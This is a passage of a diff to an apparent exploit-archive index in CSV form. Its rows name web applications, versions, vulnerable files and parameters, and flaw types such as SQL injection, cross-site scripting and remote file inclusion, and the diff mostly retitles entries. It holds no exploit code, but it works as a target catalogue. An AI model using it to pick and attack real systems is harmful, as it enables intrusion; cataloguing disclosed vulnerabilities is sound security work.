Forgery",2014-02-26,killall-9,php,webapps,80 31929,platforms/php/webapps/31929.txt,"SimpleNotes - Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,sl4xUz,php,webapps,0 31933,platforms/php/webapps/31933.txt,"OpenDocMan 1.x - 'out.php' Cross-Site Scripting",2008-06-17,"Sergi Rosello",php,webapps,0 31938,platforms/php/webapps/31938.txt,"KEIL Software PhotoKorn 1.542 - 'index.php' SQL Injection",2008-06-18,t@nzo0n,php,webapps,0 -31939,platforms/php/webapps/31939.txt,"vBulletin 3.7.1 - Moderation Control Panel 'redirect' Parameter Cross-Site Scripting",2008-06-19,"Jessica Hope",php,webapps,0 +31939,platforms/php/webapps/31939.txt,"vBulletin 3.7.1 - Moderation Control Panel 'redirect' Cross-Site Scripting",2008-06-19,"Jessica Hope",php,webapps,0 31943,platforms/php/webapps/31943.html,"GL-SH Deaf Forum 6.5.5 - Cross-Site Scripting / Arbitrary File Upload",2008-06-20,AmnPardaz,php,webapps,0 32214,platforms/php/webapps/32214.pl,"FreePBX 2.11.0 - Remote Command Execution",2014-03-12,@0x00string,php,webapps,80 31944,platforms/php/webapps/31944.txt,"phpAuction - 'profile.php' SQL Injection (2)",2008-06-21,Mr.SQL,php,webapps,0 31945,platforms/php/webapps/31945.txt,"PEGames - Multiple Cross-Site Scripting Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 -31946,platforms/php/webapps/31946.txt,"IDMOS 1.0 - 'site_absolute_path' Parameter Multiple Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0 +31946,platforms/php/webapps/31946.txt,"IDMOS 1.0 - 'site_absolute_path' Multiple Remote File Inclusions",2008-06-23,CraCkEr,php,webapps,0 31947,platforms/php/webapps/31947.txt,"Joomla! Component EXP Shop 1.0 - SQL Injection",2008-06-22,His0k4,php,webapps,0 31948,platforms/php/webapps/31948.txt,"Open Digital Assets Repository System 1.0.2 - Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 31949,platforms/php/webapps/31949.txt,"Chipmunk Blog - 'members.php' Cross-Site Scripting",2008-06-23,sl4xUz,php,webapps,0 @@ -32846,66 +32847,66 @@ id,file,description,date,author,platform,type,port 31960,platforms/php/webapps/31960.txt,"A+ PHP Scripts News Management System 0.3 - Multiple Input Validation Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 31961,platforms/php/webapps/31961.txt,"GDL 4.2 - Multiple Vulnerabilities",2014-02-27,ByEge,php,webapps,80 31962,platforms/ios/webapps/31962.txt,"Bluetooth Photo Share Pro 2.0 iOS - Multiple Vulnerabilities",2014-02-27,Vulnerability-Lab,ios,webapps,8080 -31967,platforms/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway - 'Parameters' Parameter Cross-Site Scripting",2008-06-26,"Erez Metula",asp,webapps,0 +31967,platforms/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway - 'Parameters' Cross-Site Scripting",2008-06-26,"Erez Metula",asp,webapps,0 32135,platforms/php/webapps/32135.txt,"common Solutions csphonebook 1.02 - 'index.php' Cross-Site Scripting",2008-07-31,"Ghost Hacker",php,webapps,0 32046,platforms/jsp/webapps/32046.txt,"IBM Maximo 4.1/5.2 - 'debug.jsp' HTML Injection / Information Disclosure Vulnerabilities",2008-07-11,"Deniz Cevik",jsp,webapps,0 -32047,platforms/php/webapps/32047.txt,"Hudson 1.223 - 'q' Parameter Cross-Site Scripting",2008-07-11,syniack,php,webapps,0 +32047,platforms/php/webapps/32047.txt,"Hudson 1.223 - 'q' Cross-Site Scripting",2008-07-11,syniack,php,webapps,0 31970,platforms/php/webapps/31970.txt,"PHP-CMDB 0.7.3 - Multiple Vulnerabilities",2014-02-28,HauntIT,php,webapps,80 -31971,platforms/php/webapps/31971.txt,"PHP Ticket System Beta 1 - 'get_all_created_by_user.php id' Parameter SQL Injection",2014-02-28,HauntIT,php,webapps,80 +31971,platforms/php/webapps/31971.txt,"PHP Ticket System Beta 1 - 'get_all_created_by_user.php?id' SQL Injection",2014-02-28,HauntIT,php,webapps,80 32094,platforms/cgi/webapps/32094.pl,"HiFriend - 'cgi-bin/hifriend.pl' Open Email Relay",2008-07-21,Perforin,cgi,webapps,0 -31975,platforms/php/webapps/31975.txt,"The Rat CMS - viewarticle.php Multiple Parameter Cross-Site Scripting",2008-06-26,"CWH Underground",php,webapps,0 -31976,platforms/php/webapps/31976.txt,"The Rat CMS - viewarticle2.php id Parameter Cross-Site Scripting",2008-06-26,"CWH Underground",php,webapps,0 -31977,platforms/php/webapps/31977.txt,"The Rat CMS - viewarticle.php id Parameter SQL Injection",2008-06-26,"CWH Underground",php,webapps,0 -31978,platforms/php/webapps/31978.txt,"The Rat CMS - viewarticle2.php id Parameter SQL Injection",2008-06-26,"CWH Underground",php,webapps,0 +31975,platforms/php/webapps/31975.txt,"The Rat CMS - 'viewarticle.php' Multiple Cross-Site Scripting Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0 +31976,platforms/php/webapps/31976.txt,"The Rat CMS - 'viewarticle2.php?id' Cross-Site Scripting",2008-06-26,"CWH Underground",php,webapps,0 +31977,platforms/php/webapps/31977.txt,"The Rat CMS - 'viewarticle.php?id' SQL Injection",2008-06-26,"CWH Underground",php,webapps,0 +31978,platforms/php/webapps/31978.txt,"The Rat CMS - 'viewarticle2.php?id' SQL Injection",2008-06-26,"CWH Underground",php,webapps,0 31982,platforms/php/webapps/31982.txt,"Webuzo 2.1.3 - Multiple Vulnerabilities",2014-02-28,Mahendra,php,webapps,80 32134,platforms/php/webapps/32134.txt,"H0tturk Panel - 'gizli.php' Remote File Inclusion",2008-07-31,U238,php,webapps,0 31983,platforms/multiple/webapps/31983.txt,"Plex Media Server 0.9.9.2.374-aa23a69 - Multiple Vulnerabilities",2014-02-28,"SEC Consult",multiple,webapps,32400 31986,platforms/php/webapps/31986.txt,"WordPress Plugin VideoWhisper 4.27.3 - Multiple Vulnerabilities",2014-02-28,"High-Tech Bridge SA",php,webapps,80 -31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 - 'SalesInquiry.php SortBy' Parameter SQL Injection",2014-02-28,HauntIT,php,webapps,80 +31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 - 'SalesInquiry.php?SortBy' SQL Injection",2014-02-28,HauntIT,php,webapps,80 31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation",2014-02-28,"Christian Catalano",multiple,webapps,0 31992,platforms/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,windows,webapps,0 31993,platforms/windows/webapps/31993.txt,"Oracle Demantra 12.2.1 - SQL Injection",2014-03-01,Portcullis,windows,webapps,8080 31994,platforms/windows/webapps/31994.txt,"Oracle Demantra 12.2.1 - Persistent Cross-Site Scripting",2014-03-01,Portcullis,windows,webapps,8080 31995,platforms/windows/webapps/31995.txt,"Oracle Demantra 12.2.1 - Database Credentials Disclosure",2014-03-01,Portcullis,windows,webapps,8080 -32001,platforms/php/webapps/32001.txt,"RSS-aggregator 1.0 - 'IdFlux' Parameter SQL Injection",2008-06-30,"CWH Underground",php,webapps,0 -32002,platforms/php/webapps/32002.txt,"RSS-aggregator 1.0 - 'IdTag' Parameter SQL Injection",2008-06-30,"CWH Underground",php,webapps,0 +32001,platforms/php/webapps/32001.txt,"RSS-aggregator 1.0 - 'IdFlux' SQL Injection",2008-06-30,"CWH Underground",php,webapps,0 +32002,platforms/php/webapps/32002.txt,"RSS-aggregator 1.0 - 'IdTag' SQL Injection",2008-06-30,"CWH Underground",php,webapps,0 32003,platforms/php/webapps/32003.txt,"RSS-aggregator 1.0 - Authentication Bypass",2008-06-30,"CWH Underground",php,webapps,0 -32004,platforms/php/webapps/32004.txt,"FaName 1.0 - 'index.php' Multiple Parameter Cross-Site Scripting",2008-06-30,"Jesper Jurcenoks",php,webapps,0 +32004,platforms/php/webapps/32004.txt,"FaName 1.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-06-30,"Jesper Jurcenoks",php,webapps,0 32005,platforms/php/webapps/32005.txt,"FaName 1.0 - 'page.php' name Parameter Cross-Site Scripting",2008-06-30,"Jesper Jurcenoks",php,webapps,0 32131,platforms/php/webapps/32131.txt,"ClipSharePro 4.1 - Local File Inclusion",2014-03-09,"Saadi Siddiqui",php,webapps,0 32010,platforms/php/webapps/32010.txt,"Joomla! / Mambo Component com_is 1.0.1 - Multiple SQL Injections",2008-07-02,"H-T Team",php,webapps,0 32011,platforms/php/webapps/32011.txt,"DodosMail 2.5 - 'dodosmail.php' Local File Inclusion",2008-07-07,ahmadbady,php,webapps,0 32013,platforms/php/webapps/32013.txt,"Zoph 0.7.2.1 - Unspecified SQL Injection",2008-07-07,"Julian Rodriguez",php,webapps,0 -32014,platforms/php/webapps/32014.txt,"Zoph 0.7.2.1 - search.php _off Parameter Cross-Site Scripting",2008-07-07,"Julian Rodriguez",php,webapps,0 -32015,platforms/php/webapps/32015.txt,"PHP-Nuke 4ndvddb 0.91 Module - 'id' Parameter SQL Injection",2008-07-07,Lovebug,php,webapps,0 +32014,platforms/php/webapps/32014.txt,"Zoph 0.7.2.1 - 'search.php?_off' Cross-Site Scripting",2008-07-07,"Julian Rodriguez",php,webapps,0 +32015,platforms/php/webapps/32015.txt,"PHP-Nuke 4ndvddb 0.91 Module - 'id' SQL Injection",2008-07-07,Lovebug,php,webapps,0 32016,platforms/php/webapps/32016.pl,"Fuzzylime (cms) 3.01 - 'blog.php' Local File Inclusion",2008-07-07,Cod3rZ,php,webapps,0 32017,platforms/php/webapps/32017.html,"vBulletin 3.7.1 - admincp/faq.php Injection adminlog.php Cross-Site Scripting",2008-07-08,"Jessica Hope",php,webapps,0 32020,platforms/php/webapps/32020.txt,"PageFusion 1.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-09,"Julian Rodriguez",php,webapps,0 32021,platforms/php/webapps/32021.txt,"Xomol CMS 1.2 - 'index.php' HTML Injection / Cross-Site Scripting",2008-07-09,"Julian Rodriguez",php,webapps,0 -32022,platforms/php/webapps/32022.txt,"TGS Content Management 0.3.2r2 - 'index.php' Multiple Parameter Cross-Site Scripting",2008-07-09,"Julian Rodriguez",php,webapps,0 -32023,platforms/php/webapps/32023.txt,"TGS Content Management 0.3.2r2 - 'login.php' Multiple Parameter Cross-Site Scripting",2008-07-09,"Julian Rodriguez",php,webapps,0 -32024,platforms/php/webapps/32024.txt,"V-Webmail 1.6.4 - includes/pear/Mail/RFC822.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32025,platforms/php/webapps/32025.txt,"V-Webmail 1.6.4 - includes/pear/Net/Socket.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32026,platforms/php/webapps/32026.txt,"V-Webmail 1.6.4 - includes/pear/XML/parser.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32027,platforms/php/webapps/32027.txt,"V-Webmail 1.6.4 - includes/pear/XML/Tree.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32028,platforms/php/webapps/32028.txt,"V-Webmail 1.6.4 - includes/pear/Mail/mimeDecode.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32029,platforms/php/webapps/32029.txt,"V-Webmail 1.6.4 - includes/pear/Console/Getopt.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32030,platforms/php/webapps/32030.txt,"V-Webmail 1.6.4 - includes/pear/System.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32031,platforms/php/webapps/32031.txt,"V-Webmail 1.6.4 - includes/pear/Log.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32032,platforms/php/webapps/32032.txt,"V-Webmail 1.6.4 - includes/pear/File.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32033,platforms/php/webapps/32033.txt,"V-Webmail 1.6.4 - includes/prepend.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32034,platforms/php/webapps/32034.txt,"V-Webmail 1.6.4 - includes/cachedConfig.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32035,platforms/php/webapps/32035.txt,"V-Webmail 1.6.4 - includes/prepend.php CONFIG[includes] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32036,platforms/php/webapps/32036.txt,"V-Webmail 1.6.4 - includes/email.list.search.php CONFIG[includes] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32022,platforms/php/webapps/32022.txt,"TGS Content Management 0.3.2r2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-09,"Julian Rodriguez",php,webapps,0 +32023,platforms/php/webapps/32023.txt,"TGS Content Management 0.3.2r2 - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-09,"Julian Rodriguez",php,webapps,0 +32024,platforms/php/webapps/32024.txt,"V-Webmail 1.6.4 - 'includes/pear/Mail/RFC822.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32025,platforms/php/webapps/32025.txt,"V-Webmail 1.6.4 - 'includes/pear/Net/Socket.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32026,platforms/php/webapps/32026.txt,"V-Webmail 1.6.4 - 'includes/pear/XML/parser.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32027,platforms/php/webapps/32027.txt,"V-Webmail 1.6.4 - 'includes/pear/XML/Tree.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32028,platforms/php/webapps/32028.txt,"V-Webmail 1.6.4 - 'includes/pear/Mail/mimeDecode.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32029,platforms/php/webapps/32029.txt,"V-Webmail 1.6.4 - 'includes/pear/Console/Getopt.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32030,platforms/php/webapps/32030.txt,"V-Webmail 1.6.4 - 'includes/pear/System.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32031,platforms/php/webapps/32031.txt,"V-Webmail 1.6.4 - 'includes/pear/Log.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32032,platforms/php/webapps/32032.txt,"V-Webmail 1.6.4 - 'includes/pear/File.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32033,platforms/php/webapps/32033.txt,"V-Webmail 1.6.4 - 'includes/prepend.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32034,platforms/php/webapps/32034.txt,"V-Webmail 1.6.4 - 'includes/cachedConfig.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32035,platforms/php/webapps/32035.txt,"V-Webmail 1.6.4 - 'includes/prepend.php?CONFIG[includes]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32036,platforms/php/webapps/32036.txt,"V-Webmail 1.6.4 - 'includes/email.list.search.php?CONFIG[includes]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 32037,platforms/php/webapps/32037.txt,"couponPHP CMS 1.0 - Multiple Persistent Cross-Site Scripting / SQL Injections",2014-03-03,LiquidWorm,php,webapps,0 32038,platforms/php/webapps/32038.txt,"SpagoBI 4.0 - Persistent Cross-Site Scripting",2014-03-03,"Christian Catalano",php,webapps,0 32039,platforms/php/webapps/32039.txt,"SpagoBI 4.0 - Persistent HTML Script Insertion",2014-03-03,"Christian Catalano",php,webapps,0 32040,platforms/php/webapps/32040.txt,"SpagoBI 4.0 - Arbitrary Cross-Site Scripting / Arbitrary File Upload",2014-03-03,"Christian Catalano",php,webapps,0 -32283,platforms/php/webapps/32283.txt,"Scripts4Profit DXShopCart 4.30 - 'pid' Parameter SQL Injection",2008-08-21,"Hussin X",php,webapps,0 -32284,platforms/php/webapps/32284.txt,"Simasy CMS - 'id' Parameter SQL Injection",2008-08-21,r45c4l,php,webapps,0 +32283,platforms/php/webapps/32283.txt,"Scripts4Profit DXShopCart 4.30 - 'pid' SQL Injection",2008-08-21,"Hussin X",php,webapps,0 +32284,platforms/php/webapps/32284.txt,"Simasy CMS - 'id' SQL Injection",2008-08-21,r45c4l,php,webapps,0 32051,platforms/php/webapps/32051.php,"Pubs Black Cat [The Fun] - 'browse.groups.php' SQL Injection",2008-07-14,RMx,php,webapps,0 32053,platforms/php/webapps/32053.txt,"WordPress 2.5.1 - 'press-this.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-15,anonymous,php,webapps,0 -32057,platforms/php/webapps/32057.txt,"Evaria ECMS 1.1 - 'DOCUMENT_ROOT' Parameter Multiple Remote File Inclusion",2008-07-16,ahmadbady,php,webapps,0 +32057,platforms/php/webapps/32057.txt,"Evaria ECMS 1.1 - 'DOCUMENT_ROOT' Multiple Remote File Inclusions",2008-07-16,ahmadbady,php,webapps,0 32058,platforms/php/webapps/32058.txt,"OpenPro 1.3.1 - 'search_wA.php' Remote File Inclusion",2008-07-16,"Ghost Hacker",php,webapps,0 32059,platforms/php/webapps/32059.txt,"Claroline 1.8.9 - announcements/announcements.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 32060,platforms/php/webapps/32060.txt,"Claroline 1.8.9 - calendar/agenda.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 @@ -32919,52 +32920,52 @@ id,file,description,date,author,platform,type,port 32068,platforms/php/webapps/32068.txt,"Claroline 1.8.9 - phpBB/viewtopic.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 32069,platforms/php/webapps/32069.txt,"Claroline 1.8.9 - wiki/wiki.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 32070,platforms/php/webapps/32070.txt,"Claroline 1.8.9 - work/work.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 -32071,platforms/php/webapps/32071.txt,"Claroline 1.8.9 - 'claroline/redirector.php url' Parameter Arbitrary Site Redirect",2008-07-15,"Digital Security Research Group",php,webapps,0 +32071,platforms/php/webapps/32071.txt,"Claroline 1.8.9 - 'claroline/redirector.php?url' Arbitrary Site Redirect",2008-07-15,"Digital Security Research Group",php,webapps,0 32075,platforms/php/webapps/32075.txt,"OpenDocMan 1.2.7 - Multiple Vulnerabilities",2014-03-05,"High-Tech Bridge SA",php,webapps,80 32076,platforms/php/webapps/32076.txt,"Ilch CMS 2.0 - Persistent Cross-Site Scripting",2014-03-05,"High-Tech Bridge SA",php,webapps,80 -32077,platforms/php/webapps/32077.txt,"IBS 0.15 - 'Username' Parameter Cross-Site Scripting",2008-07-17,Cyb3r-1sT,php,webapps,0 +32077,platforms/php/webapps/32077.txt,"IBS 0.15 - 'Username' Cross-Site Scripting",2008-07-17,Cyb3r-1sT,php,webapps,0 32078,platforms/php/webapps/32078.php,"Community CMS 0.1 - 'include.php' Remote File Inclusion",2008-07-17,N3TR00T3R,php,webapps,0 -32079,platforms/php/webapps/32079.txt,"CreaCMS - edition_article/edition_article.php cfg[document_uri] Parameter Remote File Inclusion",2008-07-18,Ciph3r,php,webapps,0 -32080,platforms/php/webapps/32080.txt,"CreaCMS - fonctions/get_liste_langue.php cfg[base_uri_admin] Parameter Remote File Inclusion",2008-07-18,Ciph3r,php,webapps,0 +32079,platforms/php/webapps/32079.txt,"CreaCMS - 'edition_article/edition_article.php?cfg[document_uri]' Remote File Inclusion",2008-07-18,Ciph3r,php,webapps,0 +32080,platforms/php/webapps/32080.txt,"CreaCMS - 'fonctions/get_liste_langue.php?cfg[base_uri_admin]' Remote File Inclusion",2008-07-18,Ciph3r,php,webapps,0 32081,platforms/php/webapps/32081.txt,"Lemon CMS 1.10 - 'browser.php' Local File Inclusion",2008-07-18,Ciph3r,php,webapps,0 -32082,platforms/php/webapps/32082.txt,"Def_Blog 1.0.3 - comaddok.php article Parameter SQL Injection",2008-07-18,"CWH Underground",php,webapps,0 -32083,platforms/php/webapps/32083.txt,"Def_Blog 1.0.3 - comlook.php article Parameter SQL Injection",2008-07-18,"CWH Underground",php,webapps,0 +32082,platforms/php/webapps/32082.txt,"Def_Blog 1.0.3 - 'comaddok.php?article' SQL Injection",2008-07-18,"CWH Underground",php,webapps,0 +32083,platforms/php/webapps/32083.txt,"Def_Blog 1.0.3 - 'comlook.php?article' SQL Injection",2008-07-18,"CWH Underground",php,webapps,0 32085,platforms/php/webapps/32085.txt,"PHPFreeChat 1.1 - 'demo21_with_hardocded_urls.php' Cross-Site Scripting",2008-07-18,ahmadbady,php,webapps,0 32087,platforms/php/webapps/32087.txt,"EasyBookMarker 4.0 - 'ajaxp_backend.php' Cross-Site Scripting",2008-07-21,Dr.Crash,php,webapps,0 32088,platforms/php/webapps/32088.pl,"EasyDynamicPages 3.0 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0 -32089,platforms/php/webapps/32089.pl,"EasyPublish 3.0 - 'read' Parameter Multiple SQL Injections / Cross-Site Scripting",2008-07-21,Dr.Crash,php,webapps,0 +32089,platforms/php/webapps/32089.pl,"EasyPublish 3.0 - 'read' Multiple SQL Injections / Cross-Site Scripting",2008-07-21,Dr.Crash,php,webapps,0 32090,platforms/php/webapps/32090.txt,"Maran PHP Blog - 'comments.php' Cross-Site Scripting",2008-07-21,Dr.Crash,php,webapps,0 32091,platforms/php/webapps/32091.txt,"MyBlog 0.9.8 - Multiple Remote Information Disclosure Vulnerabilities",2008-07-21,"AmnPardaz Security Research Team",php,webapps,0 32092,platforms/php/webapps/32092.txt,"Flip 3.0 - 'config.php' Remote File Inclusion",2008-07-21,Cru3l.b0y,php,webapps,0 32093,platforms/php/webapps/32093.txt,"PHPKF - 'forum_duzen.php' SQL Injection",2008-07-21,U238,php,webapps,0 32096,platforms/php/webapps/32096.pl,"EasyE-Cards 3.10 - SQL Injection / Cross-Site Scripting",2008-07-21,Dr.Crash,php,webapps,0 -32097,platforms/php/webapps/32097.txt,"XOOPS 2.0.18 - 'modules/system/admin.php fct' Parameter Traversal Local File Inclusion",2008-07-21,Ciph3r,php,webapps,0 -32098,platforms/php/webapps/32098.txt,"XOOPS 2.0.18 - modules/system/admin.php fct Parameter Cross-Site Scripting",2008-07-21,Ciph3r,php,webapps,0 -32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 - 'bbPath[path]' Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 -32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 - 'bbPath[root_theme]' Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 +32097,platforms/php/webapps/32097.txt,"XOOPS 2.0.18 - 'modules/system/admin.php?fct' Traversal Local File Inclusion",2008-07-21,Ciph3r,php,webapps,0 +32098,platforms/php/webapps/32098.txt,"XOOPS 2.0.18 - 'modules/system/admin.php?fct' Cross-Site Scripting",2008-07-21,Ciph3r,php,webapps,0 +32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 - 'bbPath[path]' Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 +32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 - 'bbPath[root_theme]' Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 32101,platforms/php/webapps/32101.txt,"eSyndiCat 1.6 - 'admin_lng' Cookie Parameter Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0 32102,platforms/php/webapps/32102.txt,"AlphAdmin CMS 1.0.5_03 - 'aa_login' Cookie Parameter Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0 32106,platforms/php/webapps/32106.txt,"Claroline 1.8 - learnPath/calendar/myagenda.php Query String Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0 32107,platforms/php/webapps/32107.txt,"Claroline 1.8 - user/user.php Query String Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0 -32108,platforms/php/webapps/32108.txt,"Claroline 1.8 - tracking/courseLog.php view Parameter Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0 -32109,platforms/php/webapps/32109.txt,"Claroline 1.8 - tracking/toolaccess_details.php toolId Parameter Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0 +32108,platforms/php/webapps/32108.txt,"Claroline 1.8 - 'tracking/courseLog.php?view' Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0 +32109,platforms/php/webapps/32109.txt,"Claroline 1.8 - 'tracking/toolaccess_details.php?toolId' Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0 32111,platforms/asp/webapps/32111.txt,"Pre Survey Generator - 'default.asp' SQL Injection",2008-07-22,DreamTurk,asp,webapps,0 -32113,platforms/php/webapps/32113.txt,"EMC Centera Universal Access 4.0_4735.p4 - 'Username' Parameter SQL Injection",2008-07-23,"Lars Heidelberg",php,webapps,0 +32113,platforms/php/webapps/32113.txt,"EMC Centera Universal Access 4.0_4735.p4 - 'Username' SQL Injection",2008-07-23,"Lars Heidelberg",php,webapps,0 32114,platforms/php/webapps/32114.txt,"AtomPhotoBlog 1.15 - 'atomPhotoBlog.php' SQL Injection",2008-07-24,Mr.SQL,php,webapps,0 32115,platforms/php/webapps/32115.txt,"Ajax File Manager - Directory Traversal",2014-03-07,"Eduardo Alves",php,webapps,0 32116,platforms/php/webapps/32116.txt,"EZContents - 'minicalendar.php' Remote File Inclusion",2008-07-25,"HACKERS PAL",php,webapps,0 32117,platforms/php/webapps/32117.txt,"Willoughby TriO 2.1 - SQL Injection",2008-07-26,dun,php,webapps,0 32118,platforms/php/webapps/32118.txt,"Greatclone GC Auction Platinum - 'category.php' SQL Injection",2008-07-27,"Hussin X",php,webapps,0 -32119,platforms/asp/webapps/32119.txt,"Web Wiz Forum 9.5 - admin_group_details.asp mode Parameter Cross-Site Scripting",2008-07-28,CSDT,asp,webapps,0 -32120,platforms/asp/webapps/32120.txt,"Web Wiz Forum 9.5 - admin_category_details.asp mode Parameter Cross-Site Scripting",2008-07-28,CSDT,asp,webapps,0 +32119,platforms/asp/webapps/32119.txt,"Web Wiz Forum 9.5 - 'admin_group_details.asp?mode' Cross-Site Scripting",2008-07-28,CSDT,asp,webapps,0 +32120,platforms/asp/webapps/32120.txt,"Web Wiz Forum 9.5 - 'admin_category_details.asp?mode' Cross-Site Scripting",2008-07-28,CSDT,asp,webapps,0 32121,platforms/php/webapps/32121.php,"Jamroom 3.3.8 - Cookie Authentication Bypass",2008-07-28,"James Bercegay",php,webapps,0 32122,platforms/php/webapps/32122.txt,"Owl Intranet Engine 0.95 - 'register.php' Cross-Site Scripting",2008-07-28,"Fabian Fingerle",php,webapps,0 -32123,platforms/php/webapps/32123.txt,"MiniBB RSS 2.0 Plugin - Multiple Remote File Inclusion",2008-07-29,"Ghost Hacker",php,webapps,0 +32123,platforms/php/webapps/32123.txt,"MiniBB RSS 2.0 Plugin - Multiple Remote File Inclusions",2008-07-29,"Ghost Hacker",php,webapps,0 32126,platforms/php/webapps/32126.txt,"ScrewTurn Software ScrewTurn Wiki 2.0.x - 'System Log' Page HTML Injection",2008-05-11,Portcullis,php,webapps,0 32128,platforms/php/webapps/32128.txt,"MJGUEST 6.8 - 'Guestbook.js.php' Cross-Site Scripting",2008-07-30,DSecRG,php,webapps,0 32130,platforms/php/webapps/32130.txt,"DEV Web Management System 1.5 - Multiple Input Validation Vulnerabilities",2008-07-30,Dr.Crash,php,webapps,0 -32139,platforms/php/webapps/32139.txt,"freeForum 1.7 - 'acuparam' Parameter Cross-Site Scripting",2008-08-01,ahmadbady,php,webapps,0 -32140,platforms/php/webapps/32140.txt,"PHP-Nuke Book Catalog Module 1.0 - 'catid' Parameter SQL Injection",2008-08-01,"H4ckCity Security Team",php,webapps,0 +32139,platforms/php/webapps/32139.txt,"freeForum 1.7 - 'acuparam' Cross-Site Scripting",2008-08-01,ahmadbady,php,webapps,0 +32140,platforms/php/webapps/32140.txt,"PHP-Nuke Book Catalog Module 1.0 - 'catid' SQL Injection",2008-08-01,"H4ckCity Security Team",php,webapps,0 32141,platforms/php/webapps/32141.txt,"Homes 4 Sale - 'results.php' Cross-Site Scripting",2008-08-04,"Ghost Hacker",php,webapps,0 32142,platforms/php/webapps/32142.php,"Pligg CMS 9.9.5 - 'CAPTCHA' Registration Automation Security Bypass",2008-08-02,"Micheal Brooks",php,webapps,0 32143,platforms/php/webapps/32143.txt,"Keld PHP-MySQL News Script 0.7.1 - 'login.php' SQL Injection",2008-08-04,crimsoN_Loyd9,php,webapps,0 @@ -32978,80 +32979,80 @@ id,file,description,date,author,platform,type,port 32151,platforms/asp/webapps/32151.pl,"Pcshey Portal - 'kategori.asp' SQL Injection",2008-08-04,U238,asp,webapps,0 32157,platforms/asp/webapps/32157.txt,"Kentico CMS 7.0.75 - User Information Disclosure",2014-03-10,"Charlie Campbell and Lyndon Mendoza",asp,webapps,80 32161,platforms/hardware/webapps/32161.txt,"Huawei E5331 MiFi Mobile Hotspot 21.344.11.00.414 - Multiple Vulnerabilities",2014-03-10,"SEC Consult",hardware,webapps,80 -32162,platforms/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - 